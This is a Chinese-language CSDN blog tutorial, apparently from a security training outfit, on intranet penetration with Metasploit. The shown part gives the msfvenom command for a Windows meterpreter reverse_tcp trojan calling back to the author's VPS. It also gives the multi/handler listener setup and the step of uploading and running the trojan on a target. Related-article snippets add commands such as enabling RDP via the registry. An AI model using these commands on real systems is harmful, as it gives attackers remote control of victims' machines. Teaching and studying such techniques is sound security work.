MSF内网渗透实战

已于 2022-05-18 11:05:23 修改
阅读量3.9k 收藏 35
点赞数 3
文章标签: web安全 渗透测试 网络安全 内网渗透 msf
于 2022-05-17 14:40:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/124821012
版权
本文详细介绍了利用MSF进行内网渗透的步骤,包括MSF木马生成、信息收集、主机探测、令牌窃取以及操作域控等环节,展示了如何在不同阶段执行相关命令和操作。
摘要由CSDN通过智能技术生成 
零基础学黑客,搜索公众号:白帽子左一

作者:掌控安全-小熊保安

本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀.

一、MSF生成木马上线目标

1. 生成木马
使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f exe > exp.exe 创建一个msf的木马(不免杀版本)

其中 -p 后面的内容是使用的 payload类型,LHOST是vps的地址,LPORT是端口

图片

2. 监听端口
命令: use exploit/multi/handler 使用msf的监听模块

设置payload: set payload windows/x64/meterpreter/reverse_tcp

这里和生成木马的时候写的payload要一样,否则会链接不上,如下图

图片

设置监听地址以及端口:

set lhost xxx.xxx.xxx.xxx
set lport 4444

设置好了之后 直接run 监听起来。

3. 弹回Meterpreter会话
将生成的msf的木马上传到目标服务器上,然后直接运行

图片

运行之后,vps的msf会收到一个弹回的meterpreter会话

最低0.47元/天 解锁文章
zkzq
关注
内网渗透实战技巧
谢公子的博客
09-28 1万+
目录 拿下Web服务器 phpmyadmin后台getshell 后渗透第一步 派生CobaltStrike权限 获得System权限 获取账号密码 远程桌面登录 添加路由、挂Socks4a代理 域信息收集 内网主机信息收集 内网存活主机探测 内网存活主机端口扫描 内网存活主机服务探测 内网横向渗透攻击技巧 MS17-010 CVE-2019-0708 pse...
网络安全MSF内网渗透
你在看屏幕的同时,屏幕也在注视着你
06-04 2993
内网渗透超级强悍
渗透实战内网渗透
kali_Ma的博客
11-22 3万+
前言 本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。 网络拓扑如下: web服务器 先来波端口扫描: 直接发现了内网的ip,这里需要提前说明一点,由于靶场搭建的问题,weblogic只在10.10.20.12这个ip上才能解析,所以需要调整下ip设置,等做完web
【kali笔记】Metasploit Framework (MSF) 从基础到进阶使用指南,零基础入门到精通,收藏这一篇就够了
最新发布
Javachichi的博客
09-27 1274
Metasploit Framework最初由HD Moore于2003年发布,并于2007年使用Ruby语言重写。MSF默认集成在Kali Linux中,同时也支持在非Kali环境下安装和使用。它提供了一套完整的渗透测试框架,包括漏洞利用模块(exploits)、攻击载荷(payloads)、辅助模块(auxiliary)、编码器(encoders)、空指令(nops)、后渗透模块(post)等多个组件。MSF的强大之处在于其可扩展性。
msf内网渗透
10-29
msf内网渗透
利用Metasploit Framework(msf)进行内网(域)渗透
初学者L_言的博客
07-03 5969
只要去往 192.168.47.0这个网段的数据都将通过 Session转发出去!!! 内网进行端口扫描:use auxiliary/scanner/portscan/tcp use exploit/windows/smb/ms08_067_netapi
掌握内网渗透之道,成为实战高手,看《内网渗透实战攻略》就够了
等风来
01-10 3019
当今,网络系统面临着越来越严峻的安全挑战。在众多的安全挑战中,一种有组织、有特定目标、长时间持续的新型网络攻击日益猖獗,国际上常称之为APT(Advanced Persistent Threat,高级持续性威胁)攻击。传统的渗透测试从外网发起攻击,并以攻破单台主机为目标。与之相比,APT攻击在技术上更加系统地实现了对目标内网主机的大批量控制,从而使业内对内网渗透技术的关注度提高到了一个空前的高度。
渗透测试实战 - 外网渗透内网穿透(超详细)
HAKUNAMATATATTA的博客
02-18 8427
渗透测试实验,外网渗透内网穿透的详细操作过程以及内网代理和内网探测的方法
一次小小的内网渗透实战(无后渗透阶段)
qq_38240166的博客
05-04 4794
时隔这么久,读书也读了,考试也考完了。开始接受别人给我一次实战的任务。--记一次学习不久的实战,以后看到可能会笑自己轻喷有问题可以留言给我。谢谢这次选在了离我家比较近的网吧。每次上网完回家身上都是一股烟味,点比较烦。所以才会想来这里。让我们开始吧1、渗透环境配置需要材料有:                 pentestbox2、存活ip寻找。nmap -sP 192.168.0.0/24看着这些...
内网渗透-实战|手把手教你如何进行内网渗透
lza20001103的博客
04-14 5213
内网渗透-实战|手把手教你如何进行内网渗透
内网渗透指南
11-13
内网渗透指南。获取目标的主机存活信息和端口开放信息后,就可以尝试分析目标的网络结构,安全防御策略。按照办公网和生产网分别说一下。
手把手教你如何进行内网渗透
热门推荐
iO快到碗里来
11-19 8万+
0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。 0x01 信息收集 systeminfo 查看系统详细信息,如OS版本、补丁安装情况,可以根据这些信息筛选可利用的漏洞。 net start 查看启动进
渗透实战内网渗透_内网渗透实例
Python84310366的博客
07-01 960
本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。
MSF多层内网渗透全过程
include_voidmain的博客
08-16 2329
MSF多层内网渗透全过程
「实战」网络安全学习:内网渗透实例
WANGJUNAIJIAO的博客
10-10 361
从linux打进去到域环境,到获取域控权限。全篇实操==(全套教程文末领取哈)==
MSF 内网渗透笔记
07-03 899
MSF 内网渗透笔记   进入meterpreter模式 在meterpreter中输入shell即可进入CMD窗口接着即可执行CMD命令,例如打开RDP服务REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_D...
实战 | 手把手教你如何进行内网渗透
jennycisp的博客
06-25 1989
内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一)内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关知识可以参考:如何从零构建对内网穿透的理解。
Kali Linux MSF渗透测试实战教程
"kali linux msf系列视频教程涵盖了从虚拟机使用到高级渗透测试技术的多个方面,包括MSF基础、漏洞利用、提权、爆破、木马生成与免杀以及持续控制等关键概念。" Kali Linux是一款基于Debian的Linux发行版,专门用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值